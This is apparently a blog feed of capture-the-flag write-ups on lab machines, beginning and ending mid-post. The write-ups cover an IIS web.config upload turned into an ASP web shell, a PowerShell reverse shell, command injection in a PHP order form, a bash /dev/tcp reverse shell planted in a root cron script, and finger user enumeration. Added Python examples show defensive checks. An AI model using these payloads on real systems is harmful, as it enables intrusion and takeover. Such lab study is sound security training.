Nmap done: 1 IP address (1 host up) scanned in 148.15 seconds
                                              
```

So far the interesting ports are **80** and **445**. On a Windows target, 445 takes priority over 80, so we first test whether port 445 offers anything exploitable.

---

# 2. Reconnaissance

## 2.1 port 445

```bash
┌──(kali㉿kali)-[~/test]
└─$ netexec smb 192.168.205.221 -u guest -p '' --shares
SMB         192.168.205.221 445    WIN-4QU3QNHNK7E  [*] Windows 6.1 Build 7600 x64 (name:WIN-4QU3QNHNK7E) (domain:WIN-4QU3QNHNK7E) (signing:False) (SMBv1:False)                                                                                                            
SMB         192.168.205.221 445    WIN-4QU3QNHNK7E  [-] WIN-4QU3QNHNK7E\guest: STATUS_LOGON_FAILURE 
                                                                                                    
```

Guest login is not enabled, so we can move straight on to port 80.

## 2.2 port 80

```bash
┌──(kali㉿kali)-[~/test]
└─$ gobuster dir -u http://192.168.205.221 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x aspx,asp,html,txt,md -b 404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.205.221
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              asp,html,txt,md,aspx
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/*checkout*.aspx      (Status: 400) [Size: 20]
/zoc.aspx             (Status: 200) [Size: 1159]
/*docroot*.aspx       (Status: 400) [Size: 20]
/*.aspx               (Status: 400) [Size: 20]
/http%3A%2F%2Fwww.aspx (Status: 400) [Size: 20]
/**http%3a.aspx       (Status: 400) [Size: 20]
/q%26a.aspx           (Status: 400) [Size: 20]
/http%3A.aspx         (Status: 400) [Size: 20]
/*http%3A.aspx        (Status: 400) [Size: 20]
/http%3A%2F%2Fyoutube.aspx (Status: 400) [Size: 20]
/http%3A%2F%2Fblogs.aspx (Status: 400) [Size: 20]
Progress: 345575 / 7642998 (4.52%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 345933 / 7642998 (4.53%)
===============================================================
Finished
===============================================================

```

The scan found `/zoc.aspx`. Opening it in a browser shows an upload page, and an HTML comment reveals a directory path, `/Subiditosdetono/`. Appending that directory to the URL shows the following:

![image](https://github.com/user-attachments/assets/b3e461b5-23c7-4dfc-b908-ba7fea785815)

There is a `config` file, but clicking it returns **404**. So back to the upload page to see whether we can upload a **shell**.

![image](https://github.com/user-attachments/assets/bd39753c-d756-4346-b2a8-d921cc8ecfd2)

Uploading files with the `.aspx` extension is not allowed. From the earlier visit to `/Subiditosdetono/` we know a `config` file exists there, so `config` files can evidently be uploaded. Let's search [hacktricks](https://book.hacktricks.xyz/) to see whether a `config` file can serve as a `shell`.

![image](https://github.com/user-attachments/assets/3d2656b4-ae69-493a-b8f7-8e99ea490bdd)

Found something interesting. [Copy](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config) its example, upload it and run it:

```bash
┌──(kali㉿kali)-[~/test]
└─$ cat web.config 
&lt;?xml version='1.0' encoding='UTF-8'?&gt;
&lt;configuration&gt;
   &lt;system.webServer&gt;
      &lt;handlers accessPolicy='Read, Script, Write'&gt;
         &lt;add name='web_config' path='*.config' verb='*' modules='IsapiModule' scriptProcessor='%windir%\system32\inetsrv\asp.dll' resourceType='Unspecified' requireAccess='Write' preCondition='bitness64' /&gt;       
      &lt;/handlers&gt;
      &lt;security&gt;
         &lt;requestFiltering&gt;
            &lt;fileExtensions&gt;
               &lt;remove fileExtension='.config' /&gt;
            &lt;/fileExtensions&gt;
            &lt;hiddenSegments&gt;
               &lt;remove segment='web.config' /&gt;
            &lt;/hiddenSegments&gt;
         &lt;/requestFiltering&gt;
      &lt;/security&gt;
   &lt;/system.webServer&gt;
&lt;/configuration&gt;
&lt;!--
&lt;% Response.write('-'&amp;'-&gt;')%&gt;
&lt;%
Set oScript = Server.CreateObject('WSCRIPT.SHELL')
Set oScriptNet = Server.CreateObject('WSCRIPT.NETWORK')
Set oFileSys = Server.CreateObject('Scripting.FileSystemObject')

Function getCommandOutput(theCommand)
    Dim objShell, objCmdExec
    Set objShell = CreateObject('WScript.Shell')
    Set objCmdExec = objshell.exec(thecommand)

    getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%&gt;

&lt;BODY&gt;
&lt;FORM action='' method='GET'&gt;
&lt;input type='text' name='cmd' size=45 value='&lt;%= szCMD %&gt;'&gt;
&lt;input type='submit' value='Run'&gt;
&lt;/FORM&gt;

&lt;PRE&gt;
&lt;%= '\\' &amp; oScriptNet.ComputerName &amp; '\' &amp; oScriptNet.UserName %&gt;
&lt;%Response.Write(Request.ServerVariables('server_name'))%&gt;
&lt;p&gt;
&lt;b&gt;The server's port:&lt;/b&gt;
&lt;%Response.Write(Request.ServerVariables('server_port'))%&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;The server's software:&lt;/b&gt;
&lt;%Response.Write(Request.ServerVariables('server_software'))%&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;The server's software:&lt;/b&gt;
&lt;%Response.Write(Request.ServerVariables('LOCAL_ADDR'))%&gt;
&lt;% szCMD = request('cmd')
thisDir = getCommandOutput('cmd /c' &amp; szCMD)
Response.Write(thisDir)%&gt;
&lt;/p&gt;
&lt;br&gt;
&lt;/BODY&gt;



&lt;%Response.write('&lt;!-'&amp;'-') %&gt;
--&gt;
        
```
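An allowlist filename check for an upload handler, as a contrast to the deny-list above that rejected `.aspx` but accepted `web.config`. Added example, not code from the write-up or from the target; the permitted extensions and the reserved-name list are illustrative assumptions.

```python
"""Allowlist-based filename policy for an upload endpoint.

Added example, not from the original write-up. The target's check blocked
'.aspx' and let 'web.config' through; IIS then executed the uploaded
configuration as ASP. A deny-list can only ever enumerate what its author
thought of, so this version lists what is permitted instead.
"""
import re

# Assumptions for illustration: what the application legitimately needs.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}
# Basenames that IIS/ASP.NET interprets rather than serves; never writable into a served tree.
RESERVED_BASENAMES = {"web.config", "global.asax", "machine.config"}
# Stem: starts alphanumeric, then alphanumerics, '_' or '-', at most 64 characters in total.
SAFE_STEM = re.compile(r"^[a-z0-9][a-z0-9_\-]{0,63}$")


def upload_filename_decision(raw_name):
    """Return (accepted, reason) for a client-supplied filename."""
    # Keep only the last path component, whichever separator the client used.
    name = raw_name.replace("\\", "/").split("/")[-1]
    # Windows silently drops trailing dots and spaces, so normalise before comparing
    # ('web.config.' would otherwise slip past the reserved-name check).
    name = name.rstrip(". ").lower()
    if not name:
        return (False, "empty name")
    if name in RESERVED_BASENAMES:
        return (False, "reserved server filename")
    parts = name.split(".")
    if len(parts) != 2:
        # no 'a.aspx.png' style double extensions, no extensionless files
        return (False, "must have exactly one extension")
    stem, ext = parts
    if ext not in ALLOWED_EXTENSIONS:
        return (False, "extension not in allowlist")
    if not SAFE_STEM.match(stem):
        return (False, "stem contains disallowed characters")
    return (True, "ok")


def deny_list_decision(raw_name):
    """The kind of check the write-up ran into: only '.aspx' is refused."""
    return not raw_name.lower().endswith(".aspx")


if __name__ == "__main__":
    for candidate in ["photo.png", "web.config", "web.config.", "shell.aspx.png"]:
        print(candidate, "deny-list:", deny_list_decision(candidate),
              "allowlist:", upload_filename_decision(candidate))
```

Name validation only narrows the problem: the upload directory must also be served without script or ISAPI handler mappings, otherwise any accepted file that a handler claims will still execute.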

![image](https://github.com/user-attachments/assets/2ab0ece6-4187-4cc6-93dd-610a3eb4cfdc)

Get a **shell** back:

```bash
powershell -nop -c '$client = New-Object System.Net.Sockets.TCPClient('192.168.205.141',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '&gt; ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

# attacker machine
┌──(kali㉿kali)-[~/test/netcat]
└─$ nc -lvnp 8888
listening on [any] 8888 ...
connect to [192.168.205.141] from (UNKNOWN) [192.168.205.221] 49159
whoami
win-4qu3qnhnk7e\info
```

---

# 3. Privilege escalation

With a **shell**, check our privileges:

```bash
PS C:\users\info&gt; whoami /priv

INFORMACI?N DE PRIVILEGIOS
--------------------------

Nombre de privilegio          Descripci?n                                  Estado     
============================= ============================================ =============
SeChangeNotifyPrivilege       Omitir comprobaci?n de recorrido             Habilitada   
SeImpersonatePrivilege        Suplantar a un cliente tras la autenticaci?n Habilitada   
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Deshabilitado

```

We have `SeImpersonatePrivilege`, so we can use the **[JuicyPotato](https://github.com/ohpe/juicy-potato)** tool to escalate privileges.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/thl_ensala-papas.html</guid><pubDate>Thu, 20 Mar 2025 08:31:25 +0000</pubDate></item><item><title>thl_casa-paco</title><link>https://7r1UMPH.github.io/post/thl_casa-paco.html</link><description># thl_casa-paco

# 0. Overview

**Target machine**: [thehackerslabs - casa-paco](https://thehackerslabs.com/casa-paco/)
**Difficulty**: Beginner
**Target IP**: 192.168.205.137
**Local IP**: 192.168.205.141

# 1. Scanning

Start with `nmap`:

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.137
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-15 09:41 CST
Nmap scan report for 192.168.205.137
Host is up (0.00084s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:E2:C1:37 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.81 seconds

```

Look at **port 80** first; **port 22** is the fallback.

# 2. Reconnaissance

![image](https://github.com/user-attachments/assets/dc05800a-1c1f-4dc3-8f59-5866ab2d2370)

Add the domain name to `hosts`.

![image](https://github.com/user-attachments/assets/4470ec18-041e-40c9-9b97-c5a3c0536d5c)

It is a food-ordering site. Follow its prompts through to the order page and you find that the `Plato` field can **execute commands**, but with **restrictions**: even `ls` is refused, and the filter **cannot be bypassed** outright. So fuzz for the commands that do run:

```bash
┌──(kali㉿kali)-[~/test]
└─$ wfuzz -c -u 'http://casapaco.thl/llevar.php' -w /usr/share/seclists/Fuzzing/1-4_all_letters_a-z.txt --hc 404 -d 'name=a&amp;dish=FUZZ' --hw 89,75
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://casapaco.thl/llevar.php
Total requests: 475254

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                            
=====================================================================

000000023:   200        32 L     109 W      1276 Ch     'w'                                                                
000000110:   200        36 L     126 W      1478 Ch     'df'                                                               
000000125:   200        33 L     95 W       1184 Ch     'du'                                                               
000000238:   200        31 L     92 W       1202 Ch     'id'                                                               
000000435:   200        50 L     170 W      1814 Ch     'ps'                                                               
000000394:   200        31 L     90 W       1156 Ch     'od'                                                               
000000513:   200        70 L     390 W      5108 Ch     'ss'                                                               
000000601:   200        31 L     93 W       1172 Ch     'wc'                                                               
000000581:   200        32 L     173 W      3792 Ch     'vi'                                                               
000001112:   200        59 L     265 W      2439 Ch     'apt'                                                              
000001160:   200        34 L     110 W      1476 Ch     'arp'                                                              
000002956:   200        31 L     95 W       1215 Ch     'dir'  
(omitted)
```

`dir` can be executed.

![image](https://github.com/user-attachments/assets/bd300755-3984-4cff-aac8-c71f3c82033a)

Running `dir` reveals a page named `llevar1.php` (brute-forcing never finds it; this is the only way to see it). You can use the `od` tool to read its text.

![image](https://github.com/user-attachments/assets/415d48a5-ba24-4df3-a6f3-893788a9ea68)

I'll paste the **readable version** directly; if you want the raw output, run it yourself.

```php
&lt;!DOCTYPE html&gt;
&lt;html lang='es'&gt;
&lt;head&gt;
    &lt;meta charset='UTF-8'&gt;
    &lt;meta name='viewport' content='width=device-width, initial-scale=1.0'&gt;
    &lt;title&gt;Casa Paco - Para Llevar&lt;/title&gt;
    &lt;link rel='stylesheet' href='static/styles.css'&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;header&gt;
        &lt;h1&gt;Casa Paco - Pedido para Llevar&lt;/h1&gt;
    &lt;/header&gt;

    &lt;main&gt;
        &lt;h2&gt;Haz tu pedido para llevar&lt;/h2&gt;
        &lt;form action='llevar.php' method='POST' class='order-form'&gt;
            &lt;label for='name'&gt;Nombre:&lt;/label&gt;
            &lt;input type='text' id='name' name='name' placeholder='Tu nombre' required&gt;&lt;br&gt;

            &lt;label for='dish'&gt;Plato:&lt;/label&gt;
            &lt;input type='text' id='dish' name='dish' placeholder='Ejemplo: Pizza' required&gt;&lt;br&gt;

            &lt;button type='submit' class='btn'&gt;Enviar Pedido&lt;/button&gt;
        &lt;/form&gt;

        &lt;?php
        if ($_SERVER['REQUEST_METHOD'] == 'POST') {
            $name = htmlspecialchars($_POST['name']); // Sanitised to avoid display glitches
            $dish = $_POST['dish']; // Intentionally left unsanitised to create the vulnerability

            // Vulnerable command
            $output = shell_exec("$dish");

            echo "&lt;section class='confirmation'&gt;";
            echo "&lt;h3&gt;Pedido confirmado&lt;/h3&gt;";
            echo "&lt;p&gt;Gracias, &lt;strong&gt;$name&lt;/strong&gt;. Tu pedido de &lt;strong&gt;$dish&lt;/strong&gt; está listo para llevar.&lt;/p&gt;";
            echo "&lt;h3&gt;Salida del Comando:&lt;/h3&gt;";
            echo "&lt;pre&gt;$output&lt;/pre&gt;";
            echo "&lt;/section&gt;";
        }
        ?&gt;
    &lt;/main&gt;

    &lt;footer&gt;
        &lt;p&gt;&amp;copy; 2025 Casa Paco. Todos los derechos reservados.&lt;/p&gt;
    &lt;/footer&gt;
&lt;/body&gt;
&lt;/html&gt;
```

It is implemented the same way as `llevar.php`, but without the **restrictions**. However, unless you **pin** the request to this page, the form hands your command to `llevar.php` for execution, and that is the end of it. Below is the code of `llevar.php`:

```php
&lt;!DOCTYPE html&gt;
&lt;html lang='es'&gt;
&lt;head&gt;
    &lt;meta charset='UTF-8'&gt;
    &lt;meta name='viewport' content='width=device-width, initial-scale=1.0'&gt;
    &lt;title&gt;Casa Paco - Pedido para Llevar&lt;/title&gt;
    &lt;link rel='stylesheet' href='static/styles.css'&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;header&gt;
        &lt;h1&gt;Casa Paco - Pedido para Llevar&lt;/h1&gt;
    &lt;/header&gt;

    &lt;main&gt;
        &lt;h2&gt;Haz tu pedido para llevar&lt;/h2&gt;
        &lt;form action='llevar.php' method='POST' class='order-form'&gt;
            &lt;label for='name'&gt;Nombre:&lt;/label&gt;
            &lt;input type='text' id='name' name='name' placeholder='Tu nombre' required&gt;&lt;br&gt;

            &lt;label for='dish'&gt;Plato:&lt;/label&gt;
            &lt;input type='text' id='dish' name='dish' placeholder='Ejemplo: Cocido' required&gt;&lt;br&gt;

            &lt;button type='submit' class='btn'&gt;Enviar Pedido&lt;/button&gt;
        &lt;/form&gt;
    &lt;/main&gt;

    &lt;?php
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $name = htmlspecialchars($_POST['name']);
        $dish = $_POST['dish'];

        // Filter potentially dangerous commands
        $blacklist_pattern = '/\b(whoami|ls|pwd|cat|sh|bash)\b/i';
        if (preg_match($blacklist_pattern, $dish)) {
            die("&lt;p style='color: red;'&gt;Error: Pedido comprometido.&lt;/p&gt;");
        }

        // Allow only valid characters
        $allowed_pattern = '/^[a-zA-Z0-9\s\-_\.]+$/';
        if (!preg_match($allowed_pattern, $dish)) {
            die("&lt;p style='color: red;'&gt;Error: Pedido contiene caracteres no permitidos.&lt;/p&gt;");
        }

        // Execute the command (must not be used in a production environment without much stricter validation)
        $output = shell_exec($dish);
        echo "&lt;section class='confirmation'&gt;";
        echo "&lt;h3&gt;Pedido confirmado&lt;/h3&gt;";
        echo "&lt;p&gt;Gracias, &lt;strong&gt;$name&lt;/strong&gt;. Tu pedido de &lt;strong&gt;$dish&lt;/strong&gt; estará listo para llevar.&lt;/p&gt;";
        echo "&lt;h3&gt;Salida del Comando:&lt;/h3&gt;";
        echo "&lt;pre&gt;$output&lt;/pre&gt;";
        echo "&lt;/section&gt;";
    }
    ?&gt;

    &lt;footer&gt;
        &lt;p&gt;&amp;copy; 2025 Casa Paco. Todos los derechos reservados.&lt;/p&gt;
    &lt;/footer&gt;
&lt;/body&gt;
&lt;/html&gt;

```

That makes it simple: pin the request to `llevar1.php` and submit the command there.

![image](https://github.com/user-attachments/assets/fb94c611-0f65-4b33-922d-a52e4292dd06)

A **base64 bypass** is needed, otherwise the command will not execute.

```bash
┌──(kali㉿kali)-[~/test]
└─$ nc -lvnp 8888                                  
listening on [any] 8888 ...
id
connect to [192.168.205.141] from (UNKNOWN) [192.168.205.137] 45002
bash: cannot set terminal process group (534): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Thehackerslabs-CasaPaco:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

```
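The two checks from `llevar.php` re-implemented in Python so they can be exercised directly, next to a handler that never hands user text to a shell. This is an added example, not code from the write-up or from the target machine; the menu contents are a constructed sample.

```python
"""Why the filters in llevar.php do not stop command execution, and what does.

Added example, not part of the original write-up. It re-implements the two
checks from llevar.php (a word blacklist and a character allowlist) so they can
be tested, then shows two designs in which user input never reaches a shell.
"""
import re
import subprocess
import sys

# The two patterns copied from llevar.php.
BLACKLIST = re.compile(r"\b(whoami|ls|pwd|cat|sh|bash)\b", re.IGNORECASE)
ALLOWED_CHARS = re.compile(r"^[a-zA-Z0-9\s\-_\.]+$")


def passes_llevar_filters(dish):
    """Return True when llevar.php would hand `dish` to shell_exec().

    The blacklist names six words; the allowlist permits any command name made
    of letters, digits, whitespace, '.', '-' and '_'. Every other binary on the
    box (id, dir, df, od, ...) satisfies both, which is what the fuzzing found.
    """
    if BLACKLIST.search(dish):
        return False
    if not ALLOWED_CHARS.match(dish):
        return False
    return True


# Design 1: the dish is a key into a fixed menu; there is no command to run at all.
MENU = {"cocido": 12.50, "pizza": 9.00, "fabada": 11.00}   # constructed sample menu


def order_dish(dish):
    """Return the price of a known dish, or None for anything not on the menu."""
    return MENU.get(dish.strip().lower())


# Design 2: if a program really must be spawned, pass the input only as one
# argv element with no shell in between, so ';', '|' and friends are inert.
def argument_survives_unparsed(dish):
    """Spawn a fixed argv and return exactly what the child received as argv[1]."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", dish],
        capture_output=True, text=True, check=True)
    return result.stdout


if __name__ == "__main__":
    for sample in ["id", "dir", "ls", "ls -la"]:
        print(repr(sample), "passes llevar.php filters:", passes_llevar_filters(sample))
    print("order_dish('Cocido'):", order_dish("Cocido"))
    print("child saw:", repr(argument_survives_unparsed("pizza; id")))
```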

# 3. Getting a stable shell

After getting the **reverse shell**, obtain a stable **interactive TTY shell** with the following commands:

```bash
script /dev/null -c bash  
ctrl+z  
stty raw -echo; fg  
reset xterm  
export TERM=xterm  
echo $SHELL  
export SHELL=/bin/bash  
stty rows 59 cols 236
```

# 4. Privilege escalation

```bash
www-data@Thehackerslabs-CasaPaco:/var/www/html$ cd /home/
www-data@Thehackerslabs-CasaPaco:/home$ ls -la
total 12
drwxr-xr-x  3 root        root        4096 Jan 14 16:52 .
drwxr-xr-x 18 root        root        4096 Jan 13 14:47 ..
drwxr-xr-x  3 pacogerente pacogerente 4096 Jan 14 17:08 pacogerente
www-data@Thehackerslabs-CasaPaco:/home$ cd pacogerente/
www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ ls -al
total 36
drwxr-xr-x 3 pacogerente pacogerente 4096 Jan 14 17:08 .
drwxr-xr-x 3 root        root        4096 Jan 14 16:52 ..
lrwxrwxrwx 1 root        root           9 Jan 14 16:58 .bash_history -&gt; /dev/null
-rw-r--r-- 1 pacogerente pacogerente  220 Mar 29  2024 .bash_logout
-rw-r--r-- 1 pacogerente pacogerente 3526 Mar 29  2024 .bashrc
drwxr-xr-x 3 pacogerente pacogerente 4096 Jan 13 20:24 .local
-rw-r--r-- 1 pacogerente pacogerente  807 Mar 29  2024 .profile
-rwxrw-rw- 1 pacogerente pacogerente  110 Jan 14 16:57 fabada.sh
-rw-r--r-- 1 root        root        2417 Jan 15 03:06 log.txt
-rw-r--r-- 1 pacogerente pacogerente   33 Jan 14 17:06 user.txt
www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ cat fabada.sh
#!/bin/bash

# Generar un log de actividad
echo 'Ejecutado por cron el: $(date)' &gt;&gt; /home/pacogerente/log.txt

```

Just write a script over `fabada.sh` (don't ask why I didn't check with `pspy`; it plainly looks like a cron job to me ☝( ◠‿◠ )☝).
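An audit of cron targets for the weakness in the listing above (a script run by root that group and other can write). Added example, not part of the original write-up; the crontab line and the script it builds are a constructed sample.

```python
"""Audit cron jobs for scripts that someone other than the owner can modify.

Added example, not from the original write-up. In the listing above fabada.sh
is -rwxrw-rw- (group and other may write it) and is run by root's cron, so any
local user decides what root executes. The functions below parse
/etc/crontab-style lines (with a user field) and flag exactly that situation.
"""
import operator
import os
import stat
import tempfile


def job_paths(crontab_text):
    """Yield (user, absolute_path) for every absolute path in each cron job."""
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                                   # blank line or comment
        fields = line.split()
        if "=" in fields[0]:
            continue                                   # SHELL=/bin/sh style variable
        if fields[0].startswith("@"):
            user, cmd = fields[1], fields[2:]          # @reboot user command
        else:
            if len(fields) in range(7):
                continue                               # fewer than 7 fields: malformed
            user, cmd = fields[5], fields[6:]          # m h dom mon dow user command
        for token in cmd:
            if token.startswith("/"):
                yield user, token


def writable_by_group_or_other(path):
    """True when the group or other write bit is set (operator.and_ is bitwise AND)."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return (operator.and_(mode, stat.S_IWGRP) != 0
            or operator.and_(mode, stat.S_IWOTH) != 0)


def audit_crontab(crontab_text):
    """Return [(path, reason)] for cron targets a non-owner could tamper with."""
    findings = []
    for user, path in job_paths(crontab_text):
        if not os.path.isfile(path):
            continue                                   # not on this host; nothing to check
        if writable_by_group_or_other(path):
            findings.append((path, "writable by group/other but run as " + user))
        owner_uid = os.stat(path).st_uid
        if user == "root" and owner_uid != 0:
            findings.append((path, "run as root but owned by uid %d" % owner_uid))
    return findings


def make_sample_fixture(mode=0o766):
    """Constructed sample: a temp script with the given mode plus a crontab line running it as root."""
    workdir = tempfile.mkdtemp()
    script = os.path.join(workdir, "fabada.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\n")
    os.chmod(script, mode)
    crontab_text = "SHELL=/bin/bash\n# constructed sample\n* * * * * root " + script + "\n"
    return crontab_text, script


if __name__ == "__main__":
    text, path = make_sample_fixture()
    for found_path, why in audit_crontab(text):
        print(found_path, "-", why)
```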

```bash
www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ echo -e '#!/bin/bash\n/bin/bash -i &gt;&amp; /dev/tcp/192.168.205.141/8889 0&gt;&amp;1' &gt; fabada.
www-data@Thehackerslabs-CasaPaco:/home/pacogerente$ cat fabada.sh 
#!/bin/bash
/bin/bash -i &gt;&amp; /dev/tcp/192.168.205.141/8889 0&gt;&amp;1
```

Wait a bit; the cron interval is short.

```bash
┌──(kali㉿kali)-[~/test]
└─$ nc -lvnp 8889
listening on [any] 8889 ...
iconnect to [192.168.205.141] from (UNKNOWN) [192.168.205.137] 42802
bash: no se puede establecer el grupo de proceso de terminal (4096): Función ioctl no apropiada para el dispositivo
bash: no hay control de trabajos en este shell
root@Thehackerslabs-CasaPaco:~# d
id
uid=0(root) gid=0(root) grupos=0(root)

```

Done for the day.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/thl_casa-paco.html</guid><pubDate>Thu, 20 Mar 2025 08:30:24 +0000</pubDate></item><item><title>nyx_APex</title><link>https://7r1UMPH.github.io/post/nyx_APex.html</link><description># nyx_APex

# 0. Overview

**Target machine**: [vulnyx - APex](https://vulnyx.com/file/APex.php)
**Difficulty**: Easy
**Target IP**: 192.168.205.148
**Local IP**: 192.168.205.141

# 1. Scanning

Start with `nmap`:

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.148
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-22 19:17 CST
Nmap scan report for 192.168.205.148
Host is up (0.00026s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
79/tcp open  finger
80/tcp open  http
MAC Address: 08:00:27:8E:D9:36 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.56 seconds

```

Port 79 is a service I have not seen before, so it gets the highest priority.

# 2. Reconnaissance

Searching hacktricks turned up the relevant [page](https://book.hacktricks.wiki/zh/network-services-pentesting/pentesting-finger.html#79---pentesting-finger).

![Image](https://github.com/user-attachments/assets/f8704be5-49b0-4ede-8d26-fae86b96ee0a)

There is a Metasploit module, so let's try it first.

```bash
┌──(kali㉿kali)-[~/test]
└─$ msfconsole
msf6 &gt; use auxiliary/scanner/finger/finger_users
msf6 auxiliary(scanner/finger/finger_users) &gt; show options 

Module options (auxiliary/scanner/finger/finger_users):

   Name        Current Setting                        Required  Description
   ----        ---------------                        --------  -----------
   RHOSTS                                             yes       The target host(s), see https://docs.metasploit.com/docs/using-metas
                                                                ploit/basics/using-metasploit.html
   RPORT       79                                     yes       The target port (TCP)
   THREADS     1                                      yes       The number of concurrent threads (max one per host)
   USERS_FILE  /usr/share/metasploit-framework/data/  yes       The file that contains a list of default UNIX accounts.
               wordlists/unix_users.txt


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/finger/finger_users) &gt; set RHOSTS 192.168.205.148
RHOSTS =&gt; 192.168.205.148
msf6 auxiliary(scanner/finger/finger_users) &gt; run
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: _apt
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: backup
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: bin
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: daemon
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: dnsmasq
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: games
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: gnats
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: irc
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: list
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: lp
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: mail
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: man
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: messagebus
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: news
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: nobody
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: proxy
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: root
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: sshd
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: sync
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: sys
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: systemd-coredump
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: systemd-network
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: systemd-resolve
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: systemd-timesync
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: uucp
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: uuidd
[+] 192.168.205.148:79    - 192.168.205.148:79 - Found user: www-data
[+] 192.168.205.148:79    - 192.168.205.148:79 Users found: _apt, backup, bin, daemon, dnsmasq, games, gnats, irc, list, lp, mail, man, messagebus, news, nobody, proxy, root, sshd, sync, sys, systemd-coredump, systemd-network, systemd-resolve, systemd-timesync, uucp, uuidd, www-data
[*] 192.168.205.148:79    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

```

Extract the usernames and query finger with each of them:

```bash
┌──(kali㉿kali)-[~/test]
└─$ cat user |awk -F ': ' '{print $2}'
_apt
backup
bin
daemon
dnsmasq
games
gnats
irc
list
lp
mail
man
messagebus
news
nobody
proxy
root
sshd
sync
sys
systemd-coredump
systemd-network
systemd-resolve
systemd-timesync
uucp
uuidd
www-data
┌──(kali㉿kali)-[~/test]
└─$ while read -r user; do echo "$user" | nc -vn 192.168.205.148 79; done &lt; user
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: _apt                             Name: 
Directory: /nonexistent                 Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: backup                           Name: backup
Directory: /var/backups                 Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
(UNKNOWN) [192.168.205.148] 79 (finger) open
Login: bin                              Name: bin
Directory: /bin                         Shell: /usr/sbin/nologin
Never logged in.
No mail.
No Plan.
